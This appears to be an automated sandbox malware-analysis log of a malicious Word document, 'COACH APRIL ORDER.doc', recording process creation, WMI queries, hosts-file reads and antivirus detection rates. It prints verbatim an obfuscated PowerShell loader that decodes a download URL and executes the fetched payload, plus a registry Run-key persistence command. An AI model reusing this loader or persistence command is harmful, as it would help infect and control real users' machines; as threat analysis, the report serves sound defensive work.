Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<.......tI.........................s............H....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s....................Z.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s....................Z.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........I.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................<........J.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<........J.........................s............H...............................
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ......................2.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....~.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............../..... .......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....Z.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P........................................................s..............".....Z.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................&..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................8..........................s..............".............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................E..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................W..........................s..............".............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................c..........................s............../...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................u..........................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............../.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................~.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................Z.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................Z.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................."..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................4..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................@..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................R..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................^..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................p..........................s............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................\|..........................s............................(...............

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen		24_2_005A1EF4
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen		31_2_005B1EF4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3752
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3464
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1948
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: COACH APRIL ORDER.doc	Virustotal: Detection: 53%
Source: COACH APRIL ORDER.doc	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
